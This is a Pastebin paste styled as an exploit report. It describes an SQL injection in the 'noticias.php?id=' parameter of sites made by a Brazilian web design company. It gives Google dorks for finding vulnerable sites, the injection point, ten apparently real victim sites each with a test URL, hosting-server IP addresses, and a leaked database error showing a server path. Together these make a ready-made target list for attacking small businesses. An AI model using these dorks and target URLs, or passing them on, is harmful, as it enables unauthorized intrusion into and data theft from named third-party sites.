Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##############################################################
- # Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 16/01/2019
- # Vendor Homepage : sitesrapidos.com.br
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''criação: sitesrapidos.com.br''
- criação: sitesrapidos.com.br inurl:/noticias.php?id=
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ##############################################################
- # SQL Injection Exploit :
- ***********************
- /noticias.php?id=[SQL Injection]
- ##############################################################
- # Example Vulnerable Sites :
- *************************
- [+] sidermetal.com.br/noticias.php?id=3%27 =>
- [ Proof of Concept for SQL Inj ] => archive.is/46g98
- [+] bockrs.com.br/noticias.php?id=3%27
- [+] sanderagropecuaria.com.br/noticias.php?id=3%27
- [+] alcancyassessoria.com.br/noticias.php?id=4%27
- [+] garagetec.com.br/noticias.php?id=68%27
- [+] ferragemlampiao.com.br/noticias.php?id=1%27
- [+] marcelokuhn.com.br/noticias.php?id=1%27
- [+] genialrs.com.br/noticias.php?id=4%27
- [+] btiseguros.com.br/noticias.php?id=70%27
- [+] correspondentecaixars.com.br/noticias.php?id=5%27
- Note : (63.247.92.74) => There are 31 domains hosted on this server.
- Note : (192.185.170.138) => There are 159 domains hosted on this server.
- Note : (187.45.193.229) => There are 549 domains hosted on this server.
- Note : (187.45.210.66) => There are 95 domains hosted on this server.
- Note : (192.185.170.14) => There are 60 domains hosted on this server.
- Note : (192.185.31.71) => There are 194 domains hosted on this server.
- ##############################################################
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_array(): supplied argument is not a valid
- MySQL result resource in /home/httpd/vhosts
- /sanderagropecuaria.com.br/httpdocs/noticias.php on line 42
- ##############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement